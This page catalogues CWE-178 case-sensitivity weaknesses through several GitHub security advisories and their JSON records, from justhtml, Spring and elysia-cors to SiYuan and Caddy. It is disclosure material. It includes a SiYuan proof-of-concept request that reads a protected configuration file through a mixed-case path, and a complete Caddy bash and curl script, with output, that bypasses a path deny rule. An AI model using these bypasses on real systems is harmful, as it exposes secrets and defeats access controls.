CWE-178
AllowedImproper Handling of Case Sensitivity
Abstraction: Base · Status: Incomplete
The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.
136 vulnerabilities reference this CWE, most recent first.
GHSA-C9VM-HV86-F23R
Vulnerability from github – Published: 2026-04-10 19:20 – Updated: 2026-04-15 20:44Summary
justhtml 1.15.0 includes multiple security fixes affecting URL sanitization helpers, HTML serialization, Markdown passthrough, and several custom sanitization-policy edge cases.
These issues have different impact levels and do not all affect the default configuration in the same way.
Affected versions
justhtml<= 1.14.0
Fixed version
justhtml1.15.0released on April 9, 2026
Impact overview
Helper and serialization issues
These issues could affect applications using JustHTML helpers or programmatic DOM construction, even outside the default HTML sanitization path.
JustHTML.clean_url_value(...)andclean_url_in_js_string(...)could accept URL values such asjavascript:..., which became activejavascript:URLs after HTML attribute parsing.- URL sanitization could treat values like
\\evil.example/xor/\\evil.example/xas safe relative URLs even though browsers could resolve them as remote requests. - Malformed bracketed hosts such as
https://[evil.example]/xcould raise exceptions and crash sanitization when host allowlists were used. - Programmatic element or attribute names containing markup-breaking characters could be serialized into active HTML.
- Programmatic HTML comments containing
-->could break out of the comment and inject live markup.
Markdown passthrough issue
to_markdown(html_passthrough=True)could reintroduce active HTML from sanitized<textarea>content by emitting a raw closing</textarea>sequence.
Custom policy issues
These issues affected custom policies more than the default safe configuration.
a[ping]was handled as a single URL even though browsers interpret it as a space-separated URL list.attributionsrcwas not treated as URL-bearing and could preserve attacker-controlled reporting endpoints.link[imagesrcset]was not treated as URL-bearing and could preserve attacker-controlled image candidates.- Preserved
<meta http-equiv="refresh">tags could keep redirect targets without URL-policy enforcement. - Preserved
<base href>tags could rewrite how later relative URLs resolved in the browser. - Preserved
<style>blocks could keep resource-loading CSS such as@import,url(...), orimage-set(...). - Mixed-case attribute names in custom transform pipelines could bypass or confuse security-related transforms such as
DropAttrs(...),DropUrlAttrs(...),AllowStyleAttrs(...), andMergeAttrs(...).
Default configuration
Most of the custom-policy issues above did not affect the default JustHTML(..., sanitize=True) behavior.
The main exceptions were:
- helper APIs such as clean_url_value(...)
- programmatic DOM / serializer usage
- applications explicitly using html_passthrough=True
- applications using custom policies or custom transform pipelines
Recommended action
Upgrade to justhtml 1.15.0.
If you cannot upgrade immediately:
- avoid
html_passthrough=Truefor untrusted content - avoid preserving
<style>,<meta http-equiv="refresh">, and<base href>in custom policies - avoid allowing
ping,attributionsrc, orimagesrcsetunless you explicitly validate them - avoid serializing untrusted programmatic node names, attribute names, or comment data
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.14.0"
},
"package": {
"ecosystem": "PyPI",
"name": "justhtml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.15.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-20",
"CWE-755",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:20:04Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\n`justhtml` `1.15.0` includes multiple security fixes affecting URL sanitization helpers, HTML serialization, Markdown passthrough, and several custom sanitization-policy edge cases.\n\nThese issues have different impact levels and do not all affect the default configuration in the same way.\n\n## Affected versions\n\n- `justhtml` `\u003c= 1.14.0`\n\n## Fixed version\n\n- `justhtml` `1.15.0` released on April 9, 2026\n\n## Impact overview\n\n### Helper and serialization issues\nThese issues could affect applications using JustHTML helpers or programmatic DOM construction, even outside the default HTML sanitization path.\n\n- `JustHTML.clean_url_value(...)` and `clean_url_in_js_string(...)` could accept URL values such as `javascript\u0026#58...`, which became active `javascript:` URLs after HTML attribute parsing.\n- URL sanitization could treat values like `\\\\evil.example/x` or `/\\\\evil.example/x` as safe relative URLs even though browsers could resolve them as remote requests.\n- Malformed bracketed hosts such as `https://[evil.example]/x` could raise exceptions and crash sanitization when host allowlists were used.\n- Programmatic element or attribute names containing markup-breaking characters could be serialized into active HTML.\n- Programmatic HTML comments containing `--\u003e` could break out of the comment and inject live markup.\n\n### Markdown passthrough issue\n- `to_markdown(html_passthrough=True)` could reintroduce active HTML from sanitized `\u003ctextarea\u003e` content by emitting a raw closing `\u003c/textarea\u003e` sequence.\n\n### Custom policy issues\nThese issues affected custom policies more than the default safe configuration.\n\n- `a[ping]` was handled as a single URL even though browsers interpret it as a space-separated URL list.\n- `attributionsrc` was not treated as URL-bearing and could preserve attacker-controlled reporting endpoints.\n- `link[imagesrcset]` was not treated as URL-bearing and could preserve attacker-controlled image candidates.\n- Preserved `\u003cmeta http-equiv=\"refresh\"\u003e` tags could keep redirect targets without URL-policy enforcement.\n- Preserved `\u003cbase href\u003e` tags could rewrite how later relative URLs resolved in the browser.\n- Preserved `\u003cstyle\u003e` blocks could keep resource-loading CSS such as `@import`, `url(...)`, or `image-set(...)`.\n- Mixed-case attribute names in custom transform pipelines could bypass or confuse security-related transforms such as `DropAttrs(...)`, `DropUrlAttrs(...)`, `AllowStyleAttrs(...)`, and `MergeAttrs(...)`.\n\n## Default configuration\n\nMost of the custom-policy issues above did **not** affect the default `JustHTML(..., sanitize=True)` behavior.\n\nThe main exceptions were:\n- helper APIs such as `clean_url_value(...)`\n- programmatic DOM / serializer usage\n- applications explicitly using `html_passthrough=True`\n- applications using custom policies or custom transform pipelines\n\n## Recommended action\n\nUpgrade to `justhtml` `1.15.0`.\n\nIf you cannot upgrade immediately:\n\n- avoid `html_passthrough=True` for untrusted content\n- avoid preserving `\u003cstyle\u003e`, `\u003cmeta http-equiv=\"refresh\"\u003e`, and `\u003cbase href\u003e` in custom policies\n- avoid allowing `ping`, `attributionsrc`, or `imagesrcset` unless you explicitly validate them\n- avoid serializing untrusted programmatic node names, attribute names, or comment data",
"id": "GHSA-c9vm-hv86-f23r",
"modified": "2026-04-15T20:44:03Z",
"published": "2026-04-10T19:20:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/EmilStenstrom/justhtml/security/advisories/GHSA-c9vm-hv86-f23r"
},
{
"type": "PACKAGE",
"url": "https://github.com/EmilStenstrom/justhtml"
},
{
"type": "WEB",
"url": "https://github.com/EmilStenstrom/justhtml/compare/v1.14.0...v1.15.0"
},
{
"type": "WEB",
"url": "https://github.com/EmilStenstrom/justhtml/releases/tag/v1.15.0"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "justhtml includes multiple security fixes"
}
GHSA-CF7M-HM28-RPMP
Vulnerability from github – Published: 2022-01-18 00:00 – Updated: 2022-10-25 19:00The All in One SEO WordPress plugin before 4.1.5.3 is affected by a Privilege Escalation issue, which was discovered during an internal audit by the Jetpack Scan team, and may grant bad actors access to protected REST API endpoints they shouldn’t have access to. This could ultimately enable users with low-privileged accounts, like subscribers, to perform remote code execution on affected sites.
{
"affected": [],
"aliases": [
"CVE-2021-25036"
],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-17T13:15:00Z",
"severity": "HIGH"
},
"details": "The All in One SEO WordPress plugin before 4.1.5.3 is affected by a Privilege Escalation issue, which was discovered during an internal audit by the Jetpack Scan team, and may grant bad actors access to protected REST API endpoints they shouldn\u00e2\u20ac\u2122t have access to. This could ultimately enable users with low-privileged accounts, like subscribers, to perform remote code execution on affected sites.",
"id": "GHSA-cf7m-hm28-rpmp",
"modified": "2022-10-25T19:00:30Z",
"published": "2022-01-18T00:00:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25036"
},
{
"type": "WEB",
"url": "https://jetpack.com/2021/12/14/severe-vulnerabilities-fixed-in-all-in-one-seo-plugin-version-4-1-5-3"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/2640944/all-in-one-seo-pack/trunk/app/Common/Api/Api.php"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/6de4a7de-6b71-4349-8e52-04c89c5e6d6c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CF98-J28V-49V6
Vulnerability from github – Published: 2026-06-18 15:05 – Updated: 2026-06-18 15:05Description
In OpenFGA, when MySQL is being used as the datastore, two distinct check requests can return the same response.
Preconditions
This applies if the following preconditions are met:
- You run OpenFGA with MySQL as the datastore
- Your authorization decisions rely on case-sensitive user strings.
Fix
Upgrade to OpenFGA 1.18.0 or greater.
Acknowledgements
OpenFGA would like to thank @sahajamoth for the detailed report.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/openfga/openfga"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.18.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55170"
],
"database_specific": {
"cwe_ids": [
"CWE-178"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T15:05:30Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "## Description\n\nIn OpenFGA, when MySQL is being used as the datastore, two distinct check requests can return the same response.\n\n## Preconditions\n\nThis applies if the following preconditions are met:\n\n1. You run OpenFGA with MySQL as the datastore\n2. Your authorization decisions rely on case-sensitive user strings.\n\n## Fix\nUpgrade to OpenFGA 1.18.0 or greater.\n\n## Acknowledgements\nOpenFGA would like to thank @sahajamoth for the detailed report.",
"id": "GHSA-cf98-j28v-49v6",
"modified": "2026-06-18T15:05:30Z",
"published": "2026-06-18T15:05:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openfga/openfga/security/advisories/GHSA-cf98-j28v-49v6"
},
{
"type": "PACKAGE",
"url": "https://github.com/openfga/openfga"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenFGA Improper Policy Enforcement"
}
GHSA-F72R-2H5J-7639
Vulnerability from github – Published: 2026-01-28 23:00 – Updated: 2026-02-10 19:56File Read Interface Case Bypass Vulnerability
Vulnerability Name
File Read Interface Case Bypass Vulnerability
Overview
The /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files.
On case-insensitive file systems such as Windows, attackers can bypass restrictions using mixed-case paths
and read protected configuration files.
Impact
- Read sensitive information in configuration files (e.g., access codes, API Tokens, sync configurations, etc.).
- Remotely exploitable directly when the service is published without authentication.
Trigger Conditions
- Running on a case-insensitive file system.
- The caller can access
/api/file/getFile(via CheckAuth or Token injection in published services).
PoC (Generic Example)
After enabling publication:
Request:
POST /api/file/getFile
Content-Type: application/json
{"path":"cOnf/conf.json"}
Expected Result: - Successfully return the content of the configuration file.
Root Cause
Path comparison uses strict case-sensitive string matching, without case normalization or identical file validation.
Fix Recommendations
- Normalize path casing before comparison (Windows/macOS).
- Use file-level comparison methods such as
os.SameFile. - Apply blacklist validation on sensitive paths after case normalization.
Notes
- Environment identifiers and sensitive information have been removed.
Solution Commit
399a38893e8719968ea2511e177bb53e09973fa6
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.0-20260126094835-d5d10dd41b0c"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25992"
],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-22",
"CWE-426"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-28T23:00:57Z",
"nvd_published_at": "2026-02-10T18:16:38Z",
"severity": "HIGH"
},
"details": "# File Read Interface Case Bypass Vulnerability\n## Vulnerability Name\nFile Read Interface Case Bypass Vulnerability\n\n## Overview\nThe `/api/file/getFile` endpoint uses **case-sensitive string equality checks** to block access to sensitive files.\nOn case-insensitive file systems such as **Windows**, attackers can bypass restrictions using mixed-case paths\nand read protected configuration files.\n\n## Impact\n- Read sensitive information in configuration files (e.g., access codes, API Tokens, sync configurations, etc.).\n- Remotely exploitable directly when the service is published without authentication.\n\n## Trigger Conditions\n- Running on a **case-insensitive file system**.\n- The caller can access `/api/file/getFile` (via CheckAuth or Token injection in published services).\n\n## PoC (Generic Example)\nAfter enabling publication:\n\n**Request:**\n```http\nPOST /api/file/getFile\nContent-Type: application/json\n\n{\"path\":\"cOnf/conf.json\"}\n```\n\n**Expected Result:**\n- Successfully return the content of the configuration file.\n\n## Root Cause\nPath comparison uses strict case-sensitive string matching, without case normalization or identical file validation.\n\n## Fix Recommendations\n- Normalize path casing before comparison (Windows/macOS).\n- Use file-level comparison methods such as `os.SameFile`.\n- Apply blacklist validation on sensitive paths **after case normalization**.\n\n## Notes\n- Environment identifiers and sensitive information have been removed.\n\n## Solution Commit\n`399a38893e8719968ea2511e177bb53e09973fa6`",
"id": "GHSA-f72r-2h5j-7639",
"modified": "2026-02-10T19:56:53Z",
"published": "2026-01-28T23:00:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f72r-2h5j-7639"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25992"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/commit/1f02650b3892d2ea3896242dd2422c30bda55e11"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SiYuan File Read API Case Sensitivity Bypass can Lead to Path Traversal"
}
GHSA-F8R2-VG7X-GH8M
Vulnerability from github – Published: 2026-03-13 20:55 – Updated: 2026-03-13 20:55Summary
matchesExecAllowlistPattern normalized patterns and targets with lowercasing and compiled glob matching too broadly on POSIX. In addition, the ? wildcard could match /, which allowed matches to cross path segments.
Impact
These matching rules could overmatch allowlist entries and permit commands or executable paths that an operator did not intend to approve.
Affected versions
openclaw <= 2026.3.8
Patch
Fixed in openclaw 2026.3.11 and included in later releases such as 2026.3.12. Exec allowlist matching now respects the intended path semantics, and regression tests cover the POSIX case-folding and slash-crossing cases.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.3.8"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-625"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:55:03Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\n`matchesExecAllowlistPattern` normalized patterns and targets with lowercasing and compiled glob matching too broadly on POSIX. In addition, the `?` wildcard could match `/`, which allowed matches to cross path segments.\n\n### Impact\n\nThese matching rules could overmatch allowlist entries and permit commands or executable paths that an operator did not intend to approve.\n\n### Affected versions\n\n`openclaw` `\u003c= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Exec allowlist matching now respects the intended path semantics, and regression tests cover the POSIX case-folding and slash-crossing cases.",
"id": "GHSA-f8r2-vg7x-gh8m",
"modified": "2026-03-13T20:55:03Z",
"published": "2026-03-13T20:55:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f8r2-vg7x-gh8m"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Exec approval allowlist patterns overmatched on POSIX paths"
}
GHSA-F9QJ-4C5X-CPCW
Vulnerability from github – Published: 2025-08-20 15:31 – Updated: 2026-01-29 02:36An Origin Validation Error in the elysia-cors library thru 1.3.0 allows attackers to bypass Cross-Origin Resource Sharing (CORS) restrictions. The library incorrectly validates the supplied origin by checking if it is a substring of any domain in the site's CORS policy, rather than performing an exact match. For example, a malicious origin like "notexample.com", "example.common.net" is whitelisted when the site's CORS policy specifies "example.com." This vulnerability enables unauthorized access to user data on sites using the elysia-cors library for CORS validation.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@elysiajs/cors"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-50864"
],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-20T20:50:39Z",
"nvd_published_at": "2025-08-20T15:15:32Z",
"severity": "MODERATE"
},
"details": "An Origin Validation Error in the elysia-cors library thru 1.3.0 allows attackers to bypass Cross-Origin Resource Sharing (CORS) restrictions. The library incorrectly validates the supplied origin by checking if it is a substring of any domain in the site\u0027s CORS policy, rather than performing an exact match. For example, a malicious origin like \"notexample.com\", \"example.common.net\" is whitelisted when the site\u0027s CORS policy specifies \"example.com.\" This vulnerability enables unauthorized access to user data on sites using the elysia-cors library for CORS validation.",
"id": "GHSA-f9qj-4c5x-cpcw",
"modified": "2026-01-29T02:36:18Z",
"published": "2025-08-20T15:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50864"
},
{
"type": "WEB",
"url": "https://github.com/elysiajs/elysia-cors/commit/9b9eb92e32a7a4b43b6d5108668941701c33e221"
},
{
"type": "PACKAGE",
"url": "https://github.com/elysiajs/elysia-cors"
},
{
"type": "WEB",
"url": "https://github.com/elysiajs/elysia-cors/blob/main/src/index.ts"
},
{
"type": "WEB",
"url": "https://github.com/elysiajs/elysia-cors/tree/main"
},
{
"type": "WEB",
"url": "https://medium.com/@raghavagrawal_23036/cors-bypass-in-popular-opensource-library-ad27fb41e16a"
},
{
"type": "WEB",
"url": "http://elysiajs.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "elysia-cors Origin Validation Error"
}
GHSA-G5MM-VMX4-3RG7
Vulnerability from github – Published: 2022-04-15 00:00 – Updated: 2024-05-15 06:24In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-context"
},
"ranges": [
{
"events": [
{
"introduced": "5.3.0"
},
{
"fixed": "5.3.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-context"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.2.21.RELEASE"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-22968"
],
"database_specific": {
"cwe_ids": [
"CWE-178"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-22T20:45:32Z",
"nvd_published_at": "2022-04-14T21:15:00Z",
"severity": "HIGH"
},
"details": "In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue.",
"id": "GHSA-g5mm-vmx4-3rg7",
"modified": "2024-05-15T06:24:20Z",
"published": "2022-04-15T00:00:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22968"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/commit/a7cf19cec5ebd270f97a194d749e2d5701ad2ab7"
},
{
"type": "PACKAGE",
"url": "https://github.com/spring-projects/spring-framework"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220602-0004"
},
{
"type": "WEB",
"url": "https://tanzu.vmware.com/security/cve-2022-22968"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper handling of case sensitivity in Spring Framework"
}
GHSA-G7PC-PC7G-H8JH
Vulnerability from github – Published: 2026-02-24 20:31 – Updated: 2026-02-27 19:53Summary
Caddy's HTTP path request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (%xx) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.
Details
In Caddy v2.10.2, MatchPath is explicitly designed to be case-insensitive and lowercases match patterns during provisioning:
modules/caddyhttp/matchers.go: rationale captured in theMatchPathcomment.MatchPath.Provisionlowercases configured patterns viastrings.ToLower.MatchPath.MatchWithErrorlowercases the request path for the normal matching path:reqPath := strings.ToLower(r.URL.Path).
But when a match pattern contains a percent sign (%), MatchPath.MatchWithError switches to "escaped space" matching and builds the comparison string from r.URL.EscapedPath():
reqPathForPattern := CleanPath(r.URL.EscapedPath(), mergeSlashes)- If it doesn't match, it
continues (skipping the remaining matching logic for that pattern).
Because r.URL.EscapedPath() is not lowercased, case differences in the request path can cause the escaped-space match to fail even though MatchPath is meant to be case-insensitive. For example, with a pattern of /admin%2Fpanel:
- Requesting
/admin%2Fpanelmatches and can be denied as intended. - Requesting
/ADMIN%2Fpaneldoes not match and falls through to other routes/handlers.
Suggested fix
- In the
%-pattern matching path, ensure the effective string passed topath.Matchis lowercased (same as the normal branch). - Simplest seems to lowercase the constructed string in
matchPatternWithEscapeSequenceright beforepath.Match.
Reproduced on:
- Stable release: v2.10.2 -- this is the release referenced in the reproduction below.
- Dev build: v2.11.0-beta.2.
- Master tip: commit 58968b3fd38cacbf4b5e07cc8c8be27696dce60f.
PoC
Prereqs:
- bash, curl
- A pre-built Caddy binary available at /opt/caddy-2.10.2/caddy (edit CADDY_BIN in the script if needed)
#!/usr/bin/env bash
set -euo pipefail
CADDY_BIN="/opt/caddy-2.10.2/caddy"
HOST="127.0.0.1"
PORT="8080"
TMPDIR="$(mktemp -d)"
CADDYFILE="${TMPDIR}/Caddyfile"
LOG="${TMPDIR}/caddy.log"
cleanup() {
if [ -n "${CADDY_PID:-}" ] && kill -0 "${CADDY_PID}" 2>/dev/null; then
kill "${CADDY_PID}" 2>/dev/null || true
wait "${CADDY_PID}" 2>/dev/null || true
fi
rm -rf "${TMPDIR}" 2>/dev/null || true
}
trap cleanup EXIT
if [ ! -x "${CADDY_BIN}" ]; then
echo "error: missing caddy binary at ${CADDY_BIN}" >&2
exit 2
fi
echo "== Caddy version =="
"${CADDY_BIN}" version
cat >"${CADDYFILE}" <<EOF
{
debug
}
:${PORT} {
log
@block {
path /admin%2Fpanel
}
respond @block "DENY" 403
respond "ALLOW" 200
}
EOF
echo
echo "== Caddyfile =="
cat "${CADDYFILE}"
echo
echo "== Start Caddy (debug + capture logs) =="
echo "cmd: ${CADDY_BIN} run --config ${CADDYFILE} --adapter caddyfile"
"${CADDY_BIN}" run --config "${CADDYFILE}" --adapter caddyfile >"${LOG}" 2>&1 &
CADDY_PID="$!"
sleep 2
echo
echo "== Request 1 (baseline - expect deny) =="
echo "cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/admin%2Fpanel"
curl -v -H "Host: example.test" "http://${HOST}:${PORT}/admin%2Fpanel" 2>&1 || true
echo
echo "== Request 2 (BYPASS - expect allow) =="
echo "cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/ADMIN%2Fpanel"
curl -v -H "Host: example.test" "http://${HOST}:${PORT}/ADMIN%2Fpanel" 2>&1 || true
echo
echo "== Stop Caddy =="
kill "${CADDY_PID}" 2>/dev/null || true
wait "${CADDY_PID}" 2>/dev/null || true
echo
echo "== Full Caddy debug log =="
cat "${LOG}"
Expected output (Click to expand)
== Caddy version ==
v2.10.2 h1:g/gTYjGMD0dec+UgMw8SnfmJ3I9+M2TdvoRL/Ovu6U8=
== Caddyfile ==
{
debug
}
:8080 {
log
@block {
path /admin%2Fpanel
}
respond @block "DENY" 403
respond "ALLOW" 200
}
== Start Caddy (debug + capture logs) ==
cmd: /opt/caddy-2.10.2/caddy run --config /tmp/tmp.GXiRbxOnBN/Caddyfile --adapter caddyfile
== Request 1 (baseline - expect deny) ==
cmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/admin%2Fpanel
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080
* using HTTP/1.x
> GET /admin%2Fpanel HTTP/1.1
> Host: example.test
> User-Agent: curl/8.15.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 403 Forbidden
< Content-Type: text/plain; charset=utf-8
< Server: Caddy
< Date: Sun, 08 Feb 2026 22:19:20 GMT
< Content-Length: 4
<
* Connection #0 to host 127.0.0.1 left intact
DENY
== Request 2 (BYPASS - expect allow) ==
cmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/ADMIN%2Fpanel
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080
* using HTTP/1.x
> GET /ADMIN%2Fpanel HTTP/1.1
> Host: example.test
> User-Agent: curl/8.15.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: text/plain; charset=utf-8
< Server: Caddy
< Date: Sun, 08 Feb 2026 22:19:20 GMT
< Content-Length: 5
<
* Connection #0 to host 127.0.0.1 left intact
ALLOW
== Stop Caddy ==
== Full Caddy debug log ==
{"level":"info","ts":1770589158.3687892,"msg":"maxprocs: Leaving GOMAXPROCS=4: CPU quota undefined"}
{"level":"info","ts":1770589158.3690693,"msg":"GOMEMLIMIT is updated","package":"github.com/KimMachineGun/automemlimit/memlimit","GOMEMLIMIT":1844136345,"previous":9223372036854775807}
{"level":"info","ts":1770589158.369109,"msg":"using config from file","file":"/tmp/tmp.GXiRbxOnBN/Caddyfile"}
{"level":"info","ts":1770589158.3704133,"msg":"adapted config to JSON","adapter":"caddyfile"}
{"level":"warn","ts":1770589158.370424,"msg":"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies","adapter":"caddyfile","file":"/tmp/tmp.GXiRbxOnBN/Caddyfile","line":2}
{"level":"info","ts":1770589158.3715324,"logger":"admin","msg":"admin endpoint started","address":"localhost:2019","enforce_origin":false,"origins":["//localhost:2019","//[::1]:2019","//127.0.0.1:2019"]}
{"level":"debug","ts":1770589158.3716462,"logger":"http.auto_https","msg":"adjusted config","tls":{"automation":{"policies":[{}]}},"http":{"servers":{"srv0":{"listen":[":8080"],"routes":[{"handle":[{"body":"DENY","handler":"static_response","status_code":403}]},{"handle":[{"body":"ALLOW","handler":"static_response","status_code":200}]}],"automatic_https":{},"logs":{}}}}}
{"level":"debug","ts":1770589158.3718414,"logger":"http","msg":"starting server loop","address":"[::]:8080","tls":false,"http3":false}
{"level":"warn","ts":1770589158.371858,"logger":"http","msg":"HTTP/2 skipped because it requires TLS","network":"tcp","addr":":8080"}
{"level":"warn","ts":1770589158.3718607,"logger":"http","msg":"HTTP/3 skipped because it requires TLS","network":"tcp","addr":":8080"}
{"level":"info","ts":1770589158.3718636,"logger":"http.log","msg":"server running","name":"srv0","protocols":["h1","h2","h3"]}
{"level":"debug","ts":1770589158.3718896,"logger":"events","msg":"event","name":"started","id":"6bb8b6fe-4980-4a48-9f7e-2146ecd48ce6","origin":"","data":null}
{"level":"info","ts":1770589158.3720388,"msg":"autosaved config (load with --resume flag)","file":"/home/vh/.config/caddy/autosave.json"}
{"level":"info","ts":1770589158.3720443,"msg":"serving initial configuration"}
{"level":"info","ts":1770589158.372355,"logger":"tls.cache.maintenance","msg":"started background certificate maintenance","cache":"0xc00064d180"}
{"level":"info","ts":1770589158.3855736,"logger":"tls","msg":"storage cleaning happened too recently; skipping for now","storage":"FileStorage:/home/vh/.local/share/caddy","instance":"a259f82d-3c7c-4706-9ca8-17456b4af729","try_again":1770675558.3855705,"try_again_in":86399.999999388}
{"level":"info","ts":1770589158.3857276,"logger":"tls","msg":"finished cleaning storage units"}
